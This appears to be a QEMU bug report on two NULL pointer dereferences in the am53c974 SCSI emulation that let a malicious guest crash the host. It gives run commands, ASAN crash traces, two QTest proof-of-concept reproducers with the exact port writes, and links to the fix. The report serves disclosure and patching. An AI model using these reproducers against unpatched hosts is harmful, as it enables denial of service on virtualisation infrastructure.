1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
|
NULL pointer dereference issues in am53c974 SCSI host bus adapter
Two NULL pointer dereference issues were found in the am53c974 SCSI host bus adapter emulation of QEMU. They could occur while handling the 'Information Transfer' command (CMD_TI) in function handle_ti() in hw/scsi/esp.c, and could be abused by a malicious guest to crash the QEMU process on the host resulting in a denial of service.
Both issues were reported by Cheolwoo Myung (Seoul National University). To reproduce them, configure and run QEMU as follows. Please find attached the required disk images.
$ ./configure --target-list=x86_64-softmmu --enable-kvm --enable-sanitizers
$ make
$ ./qemu-system-x86_64 -m 512 -drive file=./hyfuzz.img,index=0,media=disk,format=raw \
-device am53c974,id=scsi -device scsi-hd,drive=SysDisk \
-drive id=SysDisk,if=none,file=./disk.img
Additional info:
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909766
RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1909769
ASAN logs:
==672133==
hw/scsi/scsi-bus.c:1385:12: runtime error: member access within null pointer of type 'struct SCSIRequest'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==672133==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000171 (pc 0x55bd63e20b85 bp 0x7f4b6fffdfa0 sp 0x7f4b6fffdf70 T7)
==672133==The signal is caused by a READ memory access.
==672133==Hint: address points to the zero page.
#0 0x55bd63e20b85 in scsi_req_continue hw/scsi/scsi-bus.c:1385
#1 0x55bd63ab34fb in esp_do_dma hw/scsi/esp.c:453
#2 0x55bd63ab4b3c in handle_ti hw/scsi/esp.c:549
#3 0x55bd63ab72a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x55bd63d7b5dd in esp_pci_io_write hw/scsi/esp-pci.c:206
#5 0x55bd645d55a3 in memory_region_write_accessor softmmu/memory.c:491
#6 0x55bd645d5a24 in access_with_adjusted_size softmmu/memory.c:552
#7 0x55bd645e2baa in memory_region_dispatch_write softmmu/memory.c:1501
#8 0x55bd646b75ff in flatview_write_continue softmmu/physmem.c:2759
#9 0x55bd646b79d1 in flatview_write softmmu/physmem.c:2799
#10 0x55bd646b8341 in address_space_write softmmu/physmem.c:2891
#11 0x55bd646b83f9 in address_space_rw softmmu/physmem.c:2901
#12 0x55bd648c4736 in kvm_handle_io accel/kvm/kvm-all.c:2285
#13 0x55bd648c69c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531
#14 0x55bd647b2413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49
#15 0x55bd64f560de in qemu_thread_start util/qemu-thread-posix.c:521
#16 0x7f4b981763f8 in start_thread (/lib64/libpthread.so.0+0x93f8)
#17 0x7f4b980a3902 in __GI___clone (/lib64/libc.so.6+0x101902)
---
==672020==
hw/scsi/esp.c:196:62: runtime error: member access within null pointer of type 'struct SCSIDevice'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==672020==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000098 (pc 0x559bc99946fd bp 0x7f08bd737fb0 sp 0x7f08bd737f70 T7)
==672020==The signal is caused by a READ memory access.
==672020==Hint: address points to the zero page.
#0 0x559bc99946fd in do_busid_cmd hw/scsi/esp.c:196
#1 0x559bc9994e71 in do_cmd hw/scsi/esp.c:220
#2 0x559bc999ae81 in handle_ti hw/scsi/esp.c:555
#3 0x559bc999d2a9 in esp_reg_write hw/scsi/esp.c:691
#4 0x559bc9c615dd in esp_pci_io_write hw/scsi/esp-pci.c:206
#5 0x559bca4bb5a3 in memory_region_write_accessor softmmu/memory.c:491
#6 0x559bca4bba24 in access_with_adjusted_size softmmu/memory.c:552
#7 0x559bca4c8baa in memory_region_dispatch_write softmmu/memory.c:1501
#8 0x559bca59d5ff in flatview_write_continue softmmu/physmem.c:2759
#9 0x559bca59d9d1 in flatview_write softmmu/physmem.c:2799
#10 0x559bca59e341 in address_space_write softmmu/physmem.c:2891
#11 0x559bca59e3f9 in address_space_rw softmmu/physmem.c:2901
#12 0x559bca7aa736 in kvm_handle_io accel/kvm/kvm-all.c:2285
#13 0x559bca7ac9c8 in kvm_cpu_exec accel/kvm/kvm-all.c:2531
#14 0x559bca698413 in kvm_vcpu_thread_fn accel/kvm/kvm-cpus.c:49
#15 0x559bcae3c0de in qemu_thread_start util/qemu-thread-posix.c:521
#16 0x7f08e57ba3f8 in start_thread (/lib64/libpthread.so.0+0x93f8)
#17 0x7f08e56e7902 in __GI___clone (/lib64/libc.so.6+0x101902)
QTest Reproducer for the first:
/*
* Autogenerated Fuzzer Test Case
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
* See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqos/libqtest.h"
/*
* cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, -m \
* 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \
* id=disk0,if=none,file=null-co://,format=raw -nodefaults -qtest stdio
* outl 0xcf8 0x80001010
* outl 0xcfc 0xc000
* outl 0xcf8 0x80001004
* outw 0xcfc 0x05
* outb 0xc046 0x02
* outl 0xc00b 0xc100
* outl 0xc040 0x03
* outl 0xc040 0x03
* write 0x0 0x1 0x41
* outl 0xc00b 0xc100
* outw 0xc040 0x02
* outw 0xc040 0x81
* outl 0xc00b 0x9000
* EOF
*/
static void test_fuzz(void)
{
QTestState *s = qtest_init(
"-display none , -m 512M -device am53c974,id=scsi -device "
"scsi-hd,drive=disk0 -drive "
"id=disk0,if=none,file=null-co://,format=raw -nodefaults");
qtest_outl(s, 0xcf8, 0x80001010);
qtest_outl(s, 0xcfc, 0xc000);
qtest_outl(s, 0xcf8, 0x80001004);
qtest_outw(s, 0xcfc, 0x05);
qtest_outb(s, 0xc046, 0x02);
qtest_outl(s, 0xc00b, 0xc100);
qtest_outl(s, 0xc040, 0x03);
qtest_outl(s, 0xc040, 0x03);
qtest_bufwrite(s, 0x0, "\x41", 0x1);
qtest_outl(s, 0xc00b, 0xc100);
qtest_outw(s, 0xc040, 0x02);
qtest_outw(s, 0xc040, 0x81);
qtest_outl(s, 0xc00b, 0x9000);
qtest_quit(s);
}
int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_init(&argc, &argv, NULL);
if (strcmp(arch, "i386") == 0) {
qtest_add_func("fuzz/test_fuzz", test_fuzz);
}
return g_test_run();
}
QTest Reproducer for the second:
/*
* Autogenerated Fuzzer Test Case
*
* This work is licensed under the terms of the GNU GPL, version 2 or
* later. See the COPYING file in the top-level directory.
*/
#include "qemu/osdep.h"
#include "libqos/libqtest.h"
/*
* cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest, \
* -m 512M -device am53c974,id=scsi -device scsi-hd,drive=disk0 -drive \
* id=disk0,if=none,file=null-co://,format=raw -nodefaults -qtest stdio
* outl 0xcf8 0x80001001
* outl 0xcfc 0x01000000
* outl 0xcf8 0x8000100e
* outl 0xcfc 0xef800000
* outl 0xef8b 0x4100
* outw 0xef80 0x01
* outl 0xefc0 0x03
* outl 0xef8b 0xc100
* outl 0xef8b 0x9000
* EOF
*/
static void test_fuzz(void)
{
QTestState *s = qtest_init(
"-display none , -m 512M -device am53c974,id=scsi -device "
"scsi-hd,drive=disk0 -drive "
"id=disk0,if=none,file=null-co://,format=raw -nodefaults");
qtest_outl(s, 0xcf8, 0x80001001);
qtest_outl(s, 0xcfc, 0x01000000);
qtest_outl(s, 0xcf8, 0x8000100e);
qtest_outl(s, 0xcfc, 0xef800000);
qtest_outl(s, 0xef8b, 0x4100);
qtest_outw(s, 0xef80, 0x01);
qtest_outl(s, 0xefc0, 0x03);
qtest_outl(s, 0xef8b, 0xc100);
qtest_outl(s, 0xef8b, 0x9000);
qtest_quit(s);
}
int main(int argc, char **argv)
{
const char *arch = qtest_get_arch();
g_test_init(&argc, &argv, NULL);
if (strcmp(arch, "i386") == 0) {
qtest_add_func("fuzz/test_fuzz", test_fuzz);
}
return g_test_run();
}
Thank you both for the reproducers. Please see the proposed patchset here:
https://lists.gnu.org/archive/html/qemu-devel/2021-03/msg06063.html
I can confirm this is fixed now, thank you Mark.
Patchset v2:
https://lists.gnu.org/archive/html/qemu-devel/2021-03/msg06550.html
Patchset v4:
https://lists.gnu.org/archive/html/qemu-devel/2021-04/msg01000.html
Upstream commits:
https://git.qemu.org/?p=qemu.git;a=commit;h=0db895361b8a82e1114372ff9f4857abea605701
https://git.qemu.org/?p=qemu.git;a=commit;h=e392255766071c8cac480da3a9ae4f94e56d7cbc
https://git.qemu.org/?p=qemu.git;a=commit;h=e5455b8c1c6170c788f3c0fd577cc3be53539a99
https://git.qemu.org/?p=qemu.git;a=commit;h=c5fef9112b15c4b5494791cdf8bbb40bc1938dd3
https://git.qemu.org/?p=qemu.git;a=commit;h=7b320a8e67a534925048cbabfa51431e0349dafd
https://git.qemu.org/?p=qemu.git;a=commit;h=99545751734035b76bd372c4e7215bb337428d89
https://git.qemu.org/?p=qemu.git;a=commit;h=fa7505c154d4d00ad89a747be2eda556643ce00e
https://git.qemu.org/?p=qemu.git;a=commit;h=fbc6510e3379fa8f8370bf71198f0ce733bf07f9
https://git.qemu.org/?p=qemu.git;a=commit;h=0ebb5fd80589835153a0c2baa1b8cc7a04e67a93
https://git.qemu.org/?p=qemu.git;a=commit;h=324c8809897c8c53ad05c3a7147d272f1711cd5e
https://git.qemu.org/?p=qemu.git;a=commit;h=607206948cacda4a80be5b976dba490970a18a76
|